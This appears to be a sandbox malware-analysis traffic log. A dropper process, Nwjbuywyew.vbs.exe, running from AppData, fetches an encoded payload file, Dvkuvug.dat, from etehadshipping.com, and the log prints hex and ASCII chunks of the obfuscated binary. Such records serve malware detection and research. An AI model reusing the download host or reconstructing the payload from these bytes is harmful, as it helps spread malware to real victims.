Timestamp	Bytes transferred	Direction	Data
2024-09-02 05:48:13 UTC	85	OUT	GET /AW/DH/Dvkuvug.dat HTTP/1.1 Host: etehadshipping.com Connection: Keep-Alive
2024-09-02 05:48:13 UTC	207	IN	HTTP/1.1 200 OK Connection: close content-type: application/octet-stream last-modified: Sat, 31 Aug 2024 00:19:53 GMT accept-ranges: bytes content-length: 958976 date: Mon, 02 Sep 2024 05:48:13 GMT
2024-09-02 05:48:14 UTC	16384	IN	Data Raw: 7a 62 a3 37 3b 33 37 38 37 37 38 33 c8 c7 33 37 80 33 37 38 33 37 38 33 77 38 33 37 38 33 37 38 33 37 38 33 37 38 33 37 38 33 37 38 33 37 38 33 37 38 33 37 38 33 37 38 33 37 38 33 b7 38 33 37 36 2c 8d 36 33 83 31 fe 16 80 32 7b f5 12 63 50 5a 44 18 43 45 57 54 45 59 5e 17 5b 52 59 56 5c 43 18 51 52 18 41 42 56 13 5e 56 13 73 77 60 17 55 5c 53 5d 1d 3a 35 39 13 38 33 37 38 33 37 38 63 72 38 33 7b 39 30 37 c5 97 d0 f7 33 37 38 33 37 38 33 37 d8 33 39 19 38 36 08 33 37 a2 3d 37 38 35 37 38 33 37 38 33 89 80 3d 37 38 13 37 38 33 f7 36 33 37 38 73 37 38 13 37 38 33 35 38 33 33 38 33 37 38 33 37 38 37 37 38 33 37 38 33 37 38 33 38 38 33 35 38 33 37 38 33 37 3b 33 77 bd 33 37 28 33 37 28 33 37 38 33 27 38 33 27 38 33 37 38 33 37 37 33 37 38 33 37 38 33 37 38 33 Data Ascii: zb7;3787783373783783w837837837837837837837837837837837838376,6312{cPZDCEWTEY^[RYV\CQRABV^Vsw`U\S]:598378378cr83{90737837837398637=785783783=787836378s787835833837837877837837838835837837;3w37(37(3783'83'83783773783783783
2024-09-02 05:48:14 UTC	16384	IN	Data Raw: 3a 32 37 38 c2 33 38 33 0f 38 33 37 2f 33 37 39 33 37 38 33 06 38 33 37 a4 36 37 38 fe 32 38 33 0e 38 33 37 2f 33 37 39 20 07 3b 33 33 38 33 37 38 33 37 38 33 37 38 19 24 08 30 37 b8 33 37 38 32 37 38 22 1f 4f 30 37 3e 13 36 38 33 37 c6 3d 37 38 0b 37 38 33 37 c6 3f 37 38 76 34 38 33 37 17 33 37 38 36 37 38 33 19 38 33 37 00 19 37 38 33 49 9f 31 37 3c 1b 96 30 33 31 18 33 37 38 33 49 07 31 37 3c 48 43 3a 33 33 02 ff c8 c7 cc 11 18 33 37 38 33 0f f9 cc c8 c7 19 49 90 31 37 3c 1b 92 30 33 31 18 32 37 38 33 49 07 31 37 3c 48 0f 3a 33 33 02 91 c8 c7 cc 11 18 31 37 38 33 0f af cc c8 c7 21 37 38 27 1d 38 33 37 2a 33 37 2c 19 37 38 33 25 38 33 23 12 33 37 38 21 37 38 27 1d 38 33 37 2a 33 37 2c 19 37 38 33 25 38 33 23 12 33 37 38 21 37 38 27 1d 38 33 37 2a 33 37 Data Ascii: :278383837/3793783837678283837/379 ;338378378378$07378278"O07>6837=787837?78v48373786783837783I17<0313783I17<HC:333783I17<0312783I17<H:331783!78'83737,783%83#378!78'83737,783%83#378!78'837*37
2024-09-02 05:48:14 UTC	16384	IN	Data Raw: cc 0f 97 cc c8 c7 13 29 38 33 37 00 6d cb c7 cc 26 1e 22 26 29 38 26 24 1b 8a 3b 33 31 18 31 37 38 33 1f f6 30 37 3e 0a 75 c4 cc c8 1e 13 21 38 33 37 00 04 cb c7 cc 26 29 22 3d 10 9d 34 38 35 17 3a 33 37 38 0b 13 c4 cc c8 00 b1 ca c7 cc 17 39 33 37 38 1b f8 3b 33 31 01 23 cb c7 cc 11 18 32 37 38 33 0f 3d cf c8 c7 22 3b 29 2a 0b 6f 32 37 38 13 3d 38 33 37 00 c1 cc c7 cc 26 1e 22 26 18 ab 37 38 33 26 24 1b 8a 3b 33 31 18 3a 37 38 33 1f f7 30 37 3e 09 e4 c3 cc c8 1e 13 1e 38 33 37 00 fb cc c7 cc 26 3d 1b f0 3b 33 31 18 38 37 38 33 0f 8f c8 c8 c7 0b bf c6 cc c8 18 1f 37 38 33 c9 36 14 37 00 93 cc c7 cc 26 29 16 1f f9 30 37 3e 22 20 56 6b 1f 96 30 37 3e 13 3e 38 33 37 10 fd 34 38 35 0e bc c8 c8 c7 15 17 12 33 37 38 0b 4e c3 cc c8 29 25 1f fa 30 37 3e 20 13 18 Data Ascii: )837m&"&)8&$;31178307>u!837&)"=485:3789378;31#2783=";)*o278=837&"&783&$;31:78307>837&=;31878378367&)07>" Vk07>>837485378N)%07>
2024-09-02 05:48:14 UTC	16384	IN	Data Raw: 11 e8 cc c8 c6 3f 28 38 13 22 38 33 37 18 0e 37 38 33 17 5d 33 37 38 6b ab 18 7e 37 38 33 1f 13 37 37 3e 0a 35 e8 cc c8 1e 13 0b 38 33 37 00 c4 f8 c7 cc 26 09 25 1f e9 30 37 3e 15 17 b4 33 37 38 0b d3 f7 cc c8 29 35 17 c9 c1 c4 cc 73 5b d1 cc c8 18 00 35 38 33 c9 36 43 37 00 f5 f8 c7 cc 49 51 32 37 3c 1b 2b 3c 33 31 10 16 33 38 35 1f 1e 37 37 3e 13 b4 39 33 37 10 18 33 38 35 0e 9f fc c8 c7 15 17 5c 32 37 38 0b ab f7 cc c8 c6 3f 28 38 13 24 38 33 37 c6 3f 24 38 af 17 ad 33 37 38 0b b3 f7 cc c8 c6 3f 28 38 13 3d 38 33 37 c6 3f 51 38 af 17 5f 33 37 38 cd 39 48 33 0f 5c fc c8 c7 21 1c d8 40 a7 38 33 3d 2e 1b e4 3b 33 31 1e 13 13 38 33 37 00 7c f8 c7 cc 0f 1b ca c8 c7 13 26 38 33 37 c6 3d 47 38 0b 0f f7 cc c8 18 da 37 38 33 17 75 33 37 38 6a c9 36 0a 37 18 2d Data Ascii: ?(8"837783]378k~78377>5837&%07>378)5s[5836C7IQ27<+<3138577>937385\278?(8$837?$8378?(8=837?Q8_3789H3\!@83=.;31837\|&837=G8783u378j67-
2024-09-02 05:48:14 UTC	16384	IN	Data Raw: 38 39 1d 38 09 c9 31 33 37 c6 3a 36 38 5c 3a 39 33 3d 12 33 1d c6 3a 37 38 5c 67 3c 33 31 12 33 0d c6 3a 37 38 cd 3e 39 33 58 2f 33 37 32 19 37 12 cd 3e 38 33 58 c2 33 37 32 19 37 02 cd 3e 38 33 c9 31 32 37 57 62 33 38 35 1d 38 1d 37 c6 3a 37 38 1b 52 39 33 3d 12 19 c9 31 33 37 57 c4 37 38 39 1d 38 19 c9 31 33 37 57 55 36 38 39 1d 38 7d 37 c6 3a 37 38 cd 3e 39 33 c9 31 31 37 10 4f 36 38 39 1d 12 cd 3e 38 33 58 45 32 37 32 19 37 16 33 c9 31 33 37 10 4d 36 38 39 1d 12 cd 3e 38 33 58 67 32 37 32 19 37 12 cd 3e 38 33 58 2d 33 37 32 19 37 12 cd 3e 38 33 58 6b 37 37 3e 19 37 26 33 1f 5f 30 37 3e 19 0d c6 3a 37 38 cd 3e 39 33 58 5f 32 37 32 19 37 72 cd 3e 38 33 c9 31 32 37 c6 3a 35 38 5c dd 38 33 3d 12 33 6d c6 3a 37 38 cd 3e 39 33 c9 31 31 37 c6 3a 34 38 5c 08 Data Ascii: 898137:68\:93=3:78\g<313:78>93X/3727>83X3727>83127Wb38587:78R93=137W7898137WU6898}7:78>93117O689>83XE27273137M689>83Xg2727>83X-3727>83Xk77>7&3_07>:78>93X_2727r>83127:58\83=3m:78>93117:48\
2024-09-02 05:48:14 UTC	16384	IN	Data Raw: 0b df fe cc c8 c6 3f 34 38 13 27 38 33 37 c6 3f 3d 38 af 17 6f 33 37 38 1b af 3c 33 31 02 f8 f1 c7 cc 11 18 f8 37 38 33 0f f8 f5 c8 c7 cd 3b 3b 33 17 39 33 37 38 13 6c 38 33 37 18 0c 37 38 33 6e a4 13 ab 38 33 37 10 a4 33 38 35 0d a4 f5 c8 c7 15 17 68 33 37 38 0b a6 fe cc c8 29 31 24 28 13 18 39 33 37 00 b0 f1 c7 cc c9 34 30 37 18 3c 37 38 33 17 cd 33 37 38 13 66 38 33 37 61 af 17 77 32 37 38 0b 53 fe cc c8 c6 3f 11 38 13 33 38 33 37 c6 3f 31 38 af 17 5c 33 37 38 0b 7b fe cc c8 18 da 37 38 33 17 75 33 37 38 6a c9 36 39 37 18 54 37 38 33 1f a0 37 37 3e 0a 19 fe cc c8 1e 13 22 38 33 37 00 10 f1 c7 cc c9 34 30 37 18 3b 37 38 33 c9 34 39 37 a4 13 12 38 33 37 00 38 f1 c7 cc c9 34 15 37 18 31 37 38 33 c9 34 35 37 a4 13 40 38 33 37 00 c0 f2 c7 cc 17 2c 33 37 38 Data Ascii: ?48'837?=8o378<31783;;39378l837783n837385h378)1$(937407<783378f837aw278S?83837?18\378{783u378j697T78377>"837407;7834978378471783457@837,378
2024-09-02 05:48:14 UTC	16384	IN	Data Raw: 37 38 33 37 38 33 37 12 20 07 3b 33 33 38 33 37 38 33 37 38 33 37 38 19 25 38 33 37 12 33 37 38 21 37 38 33 1d 38 33 37 2a 33 37 38 19 37 38 33 25 38 33 37 12 33 37 38 20 07 3b 33 33 38 33 37 38 33 37 38 33 37 38 19 24 08 37 37 3c 33 37 38 33 37 38 33 37 38 33 1d 2b 03 33 38 37 37 38 33 37 38 33 37 38 33 37 12 21 37 38 27 1d 38 33 37 2b 03 34 38 5d 37 38 33 36 38 33 26 10 44 34 38 35 17 39 33 37 38 cd 39 38 33 0f 38 33 37 38 cd 3b 38 33 72 3b 33 37 38 36 37 38 33 11 38 33 37 1d 33 37 38 0b 37 38 33 37 46 9b 35 38 37 1f 9d 3b 37 3e 13 37 38 33 37 2f 0a e2 c7 cc c8 1e 13 35 38 33 37 00 f9 c8 c7 cc 1d 46 94 35 38 37 1f 99 3b 37 3e 13 37 38 33 37 2f 09 83 c7 cc c8 1e 13 37 38 33 37 00 9a c8 c7 cc 37 38 21 37 38 24 1d 38 33 37 2a 33 37 2c 19 37 38 33 25 38 33 Data Ascii: 7837837 ;338378378378%837378!783837378783%837378 ;338378378378$77<3783783783+3877837837837!78'837+48]783683&D48593789838378;83r;37867838373787837F587;7>7837/5837F587;7>7837/783778!78$83737,783%83
2024-09-02 05:48:14 UTC	16384	IN	Data Raw: 0b 33 e7 16 83 36 0b 33 ec 16 83 36 0b 33 d1 16 83 36 0b 33 c6 16 83 36 0b 33 cb 16 83 36 0b 33 30 17 83 36 0b 33 25 17 83 36 0b 33 2a 17 83 36 0b 33 1f 17 83 36 0b 33 04 17 83 36 0b 33 09 17 83 36 0b 33 7e 17 83 36 0b 33 63 17 83 36 0b 33 68 17 83 36 0b 33 5d 17 83 36 0b 33 42 17 83 36 0b 33 b7 17 83 36 0b 33 bc 17 83 36 0b 33 a1 17 83 36 0b 33 96 17 83 36 0b 33 9b 17 83 36 2b 33 80 17 83 36 29 33 3d 0d 83 36 29 33 48 03 0c 3f 29 33 9c 03 77 3f 2b 33 e0 03 7a 3f 39 33 8a 04 85 3f 39 33 ff 04 88 3f 39 33 e4 04 f3 3f 29 33 e9 04 83 36 39 33 4a 05 cd 3f 39 33 bf 05 32 3e 39 33 a4 05 cd 3f 39 33 a9 05 36 3e 39 33 9e 05 9e 36 39 33 83 05 9e 36 39 33 88 05 9e 36 39 33 fd 05 9e 36 39 33 e2 05 af 36 2b 33 d7 05 83 36 39 33 72 07 af 36 39 33 67 07 cd 3f 39 33 6c Data Ascii: 36363636363063%63*63636363~63c63h63]63B63636363636+36)3=6)3H?)3w?+3z?93?93?93?)3693J?932>93?936>936936936936936+3693r693g?93l
2024-09-02 05:48:14 UTC	16384	IN	Data Raw: 31 35 f7 31 9b 49 33 37 30 33 a4 38 59 44 4c 3d f8 3a 87 46 38 33 3f 38 a0 37 46 40 35 3a fc 35 84 42 37 38 3b 37 ab 33 a5 4b 31 35 f7 31 f3 49 33 37 30 33 a4 38 95 44 09 3b f8 3a ff 46 38 33 3f 38 a0 37 82 40 2b 2b fc 35 ec 42 37 38 3b 37 ab 33 f9 4b 2f 35 f7 31 eb 49 33 37 30 33 a4 38 c4 44 4e 31 f8 3a d7 46 38 33 3f 38 a0 37 2c 47 5d 3a fc 35 d4 42 37 38 3b 37 ab 33 75 4c f8 30 f7 31 c3 49 33 37 30 33 a4 38 65 43 81 32 f8 3a cf 46 38 33 3f 38 a0 37 52 47 35 3a fc 35 3c 41 37 38 3b 37 ab 33 49 4c 8a 36 f7 31 3b 4a 33 37 30 33 a4 38 a1 43 4e 31 f8 3a 27 45 38 33 3f 38 a0 37 9e 47 96 2c fc 35 18 41 37 38 3b 37 ab 33 e1 4c 31 35 f7 31 1f 4a 33 37 30 33 a4 38 d9 43 ba 32 f8 3a 03 45 38 33 3f 38 a0 37 c6 47 b5 39 fc 35 00 41 37 38 3b 37 ab 33 25 4d b1 36 f7 Data Ascii: 151I37038YDL=:F83?87F@5:5B78;73K151I37038D;:F83?87@++5B78;73K/51I37038DN1:F83?87,G]:5B78;73uL01I37038eC2:F83?87RG5:5<A78;73IL61;J37038CN1:'E83?87G,5A78;73L151J37038C2:E83?87G95A78;73%M6
2024-09-02 05:48:14 UTC	16384	IN	Data Raw: 1b aa 32 37 30 33 a6 38 15 87 2e 2e 76 3d 0f a5 39 33 3f 38 a2 37 09 83 13 35 71 32 58 a1 36 38 3b 37 a9 33 0b 88 31 35 7b 36 93 aa 32 37 30 33 a6 38 74 87 e0 10 73 3d e3 a5 39 33 3f 38 a2 37 62 83 d0 1b 74 32 d8 a1 36 38 3b 37 be 2b 70 38 9c 37 72 36 c7 aa 32 37 30 33 a6 20 3c 10 ba 32 7d 3d 17 a2 39 33 3f 38 a0 37 53 83 bd 39 79 32 14 a6 36 38 3b 37 ab 33 48 88 dd 14 72 36 03 ad 32 37 30 33 a4 38 a0 87 81 32 7d 3d 0f a2 39 33 3f 38 a0 37 9f 83 35 3a 79 32 7c a6 36 38 3b 37 ab 33 8c 88 7c 2e 72 36 7b ad 32 37 30 33 a4 38 fc 87 c6 2b 7d 3d 67 a2 39 33 3f 38 a0 37 db 83 c9 20 79 32 64 a6 36 38 3b 37 ab 33 c0 88 45 35 72 36 53 ad 32 37 30 33 a4 38 38 86 ae 3b 7d 3d 43 a2 39 33 3f 38 a0 37 27 82 f0 3a 78 32 40 a6 36 38 3b 37 ab 33 04 89 31 35 73 36 b7 ad 32 Data Ascii: 27038..v=93?875q2X68;7315{627038ts=93?87bt268;7+p87r62703 <2}=93?87S9y268;73Hr6270382}=93?875:y2\|68;73\|.r6{27038+}=g93?87 y2d68;73E5r6S270388;}=C93?87':x2@68;7315s62

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49711	5.144.130.41	443	5628	C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-02 05:48:35 UTC	85	OUT	GET /AW/DH/Dvkuvug.dat HTTP/1.1 Host: etehadshipping.com Connection: Keep-Alive
2024-09-02 05:48:35 UTC	207	IN	HTTP/1.1 200 OK Connection: close content-type: application/octet-stream last-modified: Sat, 31 Aug 2024 00:19:53 GMT accept-ranges: bytes content-length: 958976 date: Mon, 02 Sep 2024 05:48:35 GMT
2024-09-02 05:48:35 UTC	1161	IN	Data Raw: 7a 62 a3 37 3b 33 37 38 37 37 38 33 c8 c7 33 37 80 33 37 38 33 37 38 33 77 38 33 37 38 33 37 38 33 37 38 33 37 38 33 37 38 33 37 38 33 37 38 33 37 38 33 37 38 33 37 38 33 37 38 33 b7 38 33 37 36 2c 8d 36 33 83 31 fe 16 80 32 7b f5 12 63 50 5a 44 18 43 45 57 54 45 59 5e 17 5b 52 59 56 5c 43 18 51 52 18 41 42 56 13 5e 56 13 73 77 60 17 55 5c 53 5d 1d 3a 35 39 13 38 33 37 38 33 37 38 63 72 38 33 7b 39 30 37 c5 97 d0 f7 33 37 38 33 37 38 33 37 d8 33 39 19 38 36 08 33 37 a2 3d 37 38 35 37 38 33 37 38 33 89 80 3d 37 38 13 37 38 33 f7 36 33 37 38 73 37 38 13 37 38 33 35 38 33 33 38 33 37 38 33 37 38 37 37 38 33 37 38 33 37 38 33 38 38 33 35 38 33 37 38 33 37 3b 33 77 bd 33 37 28 33 37 28 33 37 38 33 27 38 33 27 38 33 37 38 33 37 37 33 37 38 33 37 38 33 37 38 33 Data Ascii: zb7;3787783373783783w837837837837837837837837837837837838376,6312{cPZDCEWTEY^[RYV\CQRABV^Vsw`U\S]:598378378cr83{90737837837398637=785783783=787836378s787835833837837877837837838835837837;3w37(37(3783'83'83783773783783783
2024-09-02 05:48:35 UTC	14994	IN	Data Raw: 0f f9 cc c8 c7 19 49 90 31 37 3c 1b 92 30 33 31 18 32 37 38 33 49 07 31 37 3c 48 ad 3a 33 33 02 91 c8 c7 cc 11 18 31 37 38 33 0f af cc c8 c7 21 37 38 24 1d 38 33 37 2a 33 37 2c 19 37 38 33 25 38 33 23 12 33 37 38 21 37 38 33 1d 38 33 37 2a 33 37 2c 19 37 38 33 25 38 33 37 12 33 37 38 30 07 30 33 33 38 33 37 38 33 37 38 33 37 38 19 36 24 33 37 3a 33 b6 39 44 cf 39 44 37 38 33 37 38 33 99 3c 70 c6 3c 0a 20 38 33 36 2b 03 34 38 b3 37 38 33 36 38 33 26 10 44 34 38 35 17 39 33 37 38 cd 39 38 33 0f 38 33 37 38 cd 3b 38 33 72 3b 33 37 38 1c 37 38 33 32 38 33 37 16 33 37 38 0b 1d 38 33 37 46 94 35 38 37 1f 99 3b 37 3e 13 37 38 33 37 46 0c 35 38 37 4c bb 31 37 3c 0a fb c7 cc c8 1e 13 37 38 33 37 00 f2 c8 c7 cc 1d 46 9b 35 38 37 1f 9d 3b 37 3e 13 35 38 33 37 46 0c Data Ascii: I17<0312783I17<H:331783!78$83737,783%83#378!78383737,783%837378003383783783786$37:39D9D783783<p< 836+48783683&D48593789838378;83r;3787832837378837F587;7>7837F587L17<7837F587;7>5837F
2024-09-02 05:48:35 UTC	16384	IN	Data Raw: 72 3b 33 37 38 1c 37 38 33 31 38 33 37 3d 33 37 38 0b 1d 38 33 37 12 4d 90 3a 33 33 10 92 3f 38 35 17 38 33 37 38 4d 08 3a 33 33 43 be 35 38 37 0e f3 cc c8 c7 15 17 38 33 37 38 0b f7 c7 cc c8 46 9b 35 38 37 1f 9d 3b 37 3e 13 35 38 33 37 46 0c 35 38 37 4c 53 31 37 3c 0a 95 c7 cc c8 1e 13 35 38 33 37 00 a4 c8 c7 cc 25 38 33 37 12 33 37 38 21 37 38 33 1d 38 33 37 2a 33 37 38 19 37 38 33 25 38 33 37 12 33 37 38 21 37 38 27 1d 38 33 37 2a 33 37 38 19 37 38 33 25 38 33 20 12 33 37 38 21 37 38 27 1d 38 33 37 2a 33 37 2f 19 37 38 33 34 08 3b 37 3c 33 37 38 33 37 38 33 37 38 33 1d 79 7f 37 38 33 37 38 33 60 39 33 37 ba 32 37 38 ea 35 38 33 0e 38 33 37 2f 33 37 39 33 37 38 33 d8 3b 33 37 3a 32 37 38 c2 33 38 33 0f 38 33 37 2f 33 37 39 33 37 38 33 06 38 33 37 a4 36 Data Ascii: r;3787831837=378837M:33?858378M:33C5878378F587;7>5837F587LS17<5837%837378!783837378783%837378!78'837378783%83 378!78'837*37/7834;7<3783783783y783783`937278583837/3793783;37:278383837/37937838376
2024-09-02 05:48:36 UTC	16384	IN	Data Raw: 1e 25 ba 25 33 37 39 25 21 10 f6 34 38 35 11 18 10 37 38 33 1f f6 30 37 3e 09 02 c5 cc c8 1e 13 2e 38 33 37 00 19 ca c7 cc 26 29 1b f6 3b 33 31 2b 3f 17 13 33 37 38 cd 39 1f 33 0f 37 ce c8 c7 22 13 29 24 6e 2b 17 17 10 33 37 38 0b 35 c5 cc c8 00 c8 ca c7 cc 17 35 33 37 38 0b c4 c4 cc c8 29 22 44 1f 32 37 32 20 21 18 20 37 38 33 0f d8 cf c8 c7 22 26 18 4b 36 38 33 5d 10 9d 34 38 35 17 2f 33 37 38 1b f8 3b 33 31 02 f7 cb c7 cc 11 18 2a 37 38 33 0f 81 cf c8 c7 22 3f 2f 6b 24 30 13 23 38 33 37 10 fd 34 38 35 0d 9c cf c8 c7 15 17 3e 33 37 38 0b ae c4 cc c8 00 c4 ca c7 cc 17 3b 33 37 38 1b f8 3b 33 31 02 b6 cb c7 cc 11 18 3d 37 38 33 0f 42 cf c8 c7 25 24 30 13 3b 38 33 37 00 5e cb c7 cc 0f 97 cc c8 c7 13 29 38 33 37 00 6d cb c7 cc 26 1e 22 26 29 38 26 24 1b 8a Data Ascii: %%379%!48578307>.837&);31+?378937")$n+37855378)"D272 ! 783"&K683]485/378;31*783"?/k$0#837485>378;378;31=783B%$0;837^)837m&"&)8&$
2024-09-02 05:48:36 UTC	16384	IN	Data Raw: 33 c9 36 43 37 00 32 e6 c7 cc 0f 94 de c8 c7 13 fa 39 33 37 10 19 33 38 35 0d c9 e3 c8 c7 15 17 db 33 37 38 0b d1 e8 cc c8 29 5b 26 28 22 69 2e a2 ab 18 2a 36 38 33 1f 13 37 37 3e 0a f9 e8 cc c8 1e 13 9c 38 33 37 00 f0 e7 c7 cc 25 3f 1b 4e 38 33 3d 2b 3b 17 23 31 37 38 1b 1d 3c 33 31 02 98 e7 c7 cc 11 18 78 37 38 33 0f 98 e3 c8 c7 13 e6 38 33 37 18 76 37 38 33 6e c6 3d 51 38 13 84 38 33 37 10 19 33 38 35 0e ba e3 c8 c7 15 17 0e 32 37 38 0b 40 e8 cc c8 18 cb 37 38 33 17 6a 33 37 38 6a c9 36 55 37 18 68 37 38 33 1f 12 37 37 3e 0a 6e e8 cc c8 1e 13 59 38 33 37 00 7d e7 c7 cc c9 34 41 37 18 3d 37 38 33 c9 34 0a 37 a4 13 ea 38 33 37 10 19 33 38 35 0d 09 e3 c8 c7 15 17 e0 33 37 38 0b 11 e8 cc c8 c6 3f 28 38 13 22 38 33 37 18 0e 37 38 33 17 5d 33 37 38 6b ab 18 Data Ascii: 36C72937385378)[&("i.*68377>837%?N83=+;#178<31x783837v783n=Q8837385278@783j378j6U7h78377>nY837}4A7=78347837385378?(8"837783]378k
2024-09-02 05:48:36 UTC	16384	IN	Data Raw: 1d 26 33 1f 4a 33 37 32 19 09 38 cd 3e 38 33 c9 31 32 37 10 40 36 38 39 1d 06 33 c9 31 33 37 c6 3a 36 38 1b 43 39 33 3d 12 19 c9 31 33 37 57 a4 37 38 39 1d 38 19 c9 31 33 37 57 9b 37 38 39 1d 38 19 c9 31 33 37 57 9a 37 38 39 1d 38 19 c9 31 33 37 57 99 37 38 39 1d 38 19 c9 31 33 37 57 2e 37 38 39 1d 38 0d 37 c6 3a 37 38 cd 3e 39 33 1f 26 33 37 32 19 1d c6 3a 37 38 5c 42 39 33 3d 12 33 1d c6 3a 37 38 5c 41 39 33 3d 12 33 1d c6 3a 37 38 5c 40 39 33 3d 12 33 1d c6 3a 37 38 5c 4f 39 33 3d 12 33 1d c6 3a 37 38 5c 4e 39 33 3d 12 33 09 38 cd 3e 38 33 c9 31 32 37 10 49 36 38 39 1d 06 33 c9 31 33 37 c6 3a 36 38 1b 4c 39 33 3d 12 19 c9 31 33 37 57 98 37 38 39 1d 38 19 c9 31 33 37 57 2b 37 38 39 1d 38 09 c9 31 33 37 c6 3a 36 38 5c 3a 39 33 3d 12 33 1d c6 3a 37 38 5c Data Ascii: &3J3728>83127@6893137:68C93=137W7898137W7898137W7898137W7898137W.78987:78>93&372:78\B93=3:78\A93=3:78\@93=3:78\O93=3:78\N93=38>83127I6893137:68L93=137W7898137W+7898137:68\:93=3:78\
2024-09-02 05:48:36 UTC	16384	IN	Data Raw: 38 33 37 10 ab 33 38 35 0d fd f4 c8 c7 15 17 06 33 37 38 0b 8d ff cc c8 18 22 37 38 33 17 20 33 37 38 6b c9 36 39 37 18 2a 37 38 33 0f 99 f4 c8 c7 cd 3b 3b 33 17 39 33 37 38 cd 3b 32 33 ab 18 8d 37 38 33 1f a0 37 37 3e 09 b3 ff cc c8 1e 13 33 39 33 37 00 4a f0 c7 cc 17 9f 33 37 38 13 00 38 33 37 61 cd 39 32 33 17 ce 33 37 38 0b 57 ff cc c8 c6 3f 34 38 13 28 38 33 37 c6 3f 3d 38 af 17 b9 32 37 38 0b 7f ff cc c8 18 57 37 38 33 17 2c 33 37 38 6b c9 36 35 37 18 be 37 38 33 0f 17 f4 c8 c7 cd 3b 3b 33 17 25 33 37 38 cd 3b 32 33 ab 18 4b 36 38 33 0f 2f f4 c8 c7 cd 3b 3b 33 17 3b 33 37 38 13 76 38 33 37 18 63 37 38 33 6f a4 13 20 38 33 37 10 ab 33 38 35 0d cb f5 c8 c7 15 17 52 33 37 38 0b df fe cc c8 c6 3f 34 38 13 27 38 33 37 c6 3f 3d 38 af 17 6f 33 37 38 1b af Data Ascii: 837385378"783 378k697*783;;39378;2378377>3937J378837a923378W?48(837?=8278W783,378k657783;;3%378;23K683/;;3;378v837c783o 837385R378?48'837?=8o378
2024-09-02 05:48:36 UTC	16384	IN	Data Raw: 33 37 38 33 37 38 33 37 12 21 37 38 27 1d 38 33 37 2a 33 37 2c 19 37 38 33 24 08 30 37 3c 33 37 38 33 37 38 33 37 38 33 1d 2b 03 34 38 5d 37 38 33 36 38 33 26 10 44 34 38 35 17 39 33 37 38 cd 39 38 33 0f 38 33 37 38 cd 3b 38 33 72 3b 33 37 38 36 37 38 33 11 38 33 37 1d 33 37 38 0b 37 38 33 37 46 9b 35 38 37 1f 9d 3b 37 3e 13 35 38 33 37 2f 09 e2 c7 cc c8 1e 13 36 38 33 37 00 f9 c8 c7 cc 1d 46 94 35 38 37 1f 99 3b 37 3e 13 37 38 33 37 2f 09 83 c7 cc c8 1e 13 37 38 33 37 00 9a c8 c7 cc 37 38 21 37 38 25 1d 38 33 37 2a 33 37 2f 19 37 38 33 25 38 33 23 12 33 37 38 21 37 38 33 1d 38 33 37 2a 33 37 38 19 37 38 33 24 08 30 37 3c 33 37 38 33 37 38 33 37 38 33 1d 2b 03 34 38 37 37 38 33 37 38 33 37 38 33 37 12 20 07 3b 33 33 38 33 37 38 33 37 38 33 37 38 19 25 38 Data Ascii: 37837837!78'83737,783$07<3783783783+48]783683&D48593789838378;83r;37867838373787837F587;7>5837/6837F587;7>7837/783778!78%83737/783%83#378!783837*378783$07<3783783783+4877837837837 ;338378378378%8
2024-09-02 05:48:36 UTC	16384	IN	Data Raw: 36 3b 33 a6 14 af 36 3b 33 ac 14 af 36 3e 33 92 14 95 35 3b 33 98 14 af 36 3e 33 8e 14 9f 35 3e 33 f4 14 95 35 3e 33 fa 14 9a 35 3e 33 e0 14 95 35 3e 33 d6 14 95 35 3e 33 dc 14 95 35 3e 33 c2 14 9a 35 3e 33 c8 14 9a 35 3e 33 3e 15 9a 35 3e 33 24 15 9a 35 3e 33 2a 15 9a 35 3e 33 10 15 9a 35 3e 33 06 15 9a 35 3e 33 0c 15 9a 35 3e 33 72 15 83 35 3e 33 60 15 83 35 3e 33 55 15 95 35 3e 33 5a 15 95 35 3e 33 4f 15 95 35 3e 33 b4 15 95 35 29 33 b9 15 83 36 0b 33 76 16 83 36 0b 33 7b 16 83 36 0b 33 60 16 83 36 0b 33 55 16 83 36 0b 33 5a 16 83 36 0b 33 4f 16 83 36 0b 33 b4 16 83 36 0b 33 b9 16 83 36 0b 33 ae 16 83 36 0b 33 93 16 83 36 0b 33 98 16 83 36 0b 33 8d 16 83 36 0b 33 f2 16 83 36 0b 33 e7 16 83 36 0b 33 ec 16 83 36 0b 33 d1 16 83 36 0b 33 c6 16 83 36 0b 33 Data Ascii: 6;36;36>35;36>35>35>35>35>35>35>35>35>3>5>3$5>3*5>35>35>35>3r5>3`5>3U5>3Z5>3O5>35)363v63{63`63U63Z63O636363636363636363636363
2024-09-02 05:48:36 UTC	16384	IN	Data Raw: 38 a0 37 2a 42 bd 39 f1 35 64 58 37 38 3b 37 ab 33 11 49 58 24 fa 31 5b 53 33 37 30 33 a6 38 b8 46 b0 20 f5 3a 4f 5c 38 33 3f 38 a2 37 9b 42 b8 2b f0 35 b4 58 37 38 3b 37 a9 33 2f 55 85 24 fc 31 ab 53 33 37 30 33 a6 38 e7 46 fd 20 f1 3a d3 5c 38 33 3f 38 a2 37 ec 42 e8 2b f4 35 c8 58 37 38 3b 37 a9 33 27 4a ca 24 f1 31 37 54 33 37 30 33 a6 38 11 45 3e 27 fd 3a 1f 5b 38 33 3f 38 a5 37 4b 41 73 2c fe 35 60 5f 37 38 3b 37 a9 2b 38 1f b1 36 f7 31 43 49 33 37 30 33 a1 38 87 45 ba 32 f8 3a b7 46 38 33 3f 38 a0 37 c0 41 35 3a fc 35 b4 42 37 38 3b 37 ab 33 3b 4b b9 36 f7 31 a3 49 33 37 30 33 a4 38 13 44 b0 27 f8 3a af 46 38 33 3f 38 a0 37 0c 40 35 3a fc 35 9c 42 37 38 3b 37 ab 33 61 4b 31 35 f7 31 9b 49 33 37 30 33 a4 38 59 44 4c 3d f8 3a 87 46 38 33 3f 38 a0 37 Data Ascii: 87*B95dX78;73IX$1[S37038F :O\83?87B+5X78;73/U$1S37038F :\83?87B+5X78;73'J$17T37038E>':[83?87KAs,5`_78;7+861CI37038E2:F83?87A5:5B78;73;K61I37038D':F83?87@5:5B78;73aK151I37038YDL=:F83?87

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49714	5.144.130.41	443	3276	C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe

Timestamp	Bytes transferred	Direction	Data
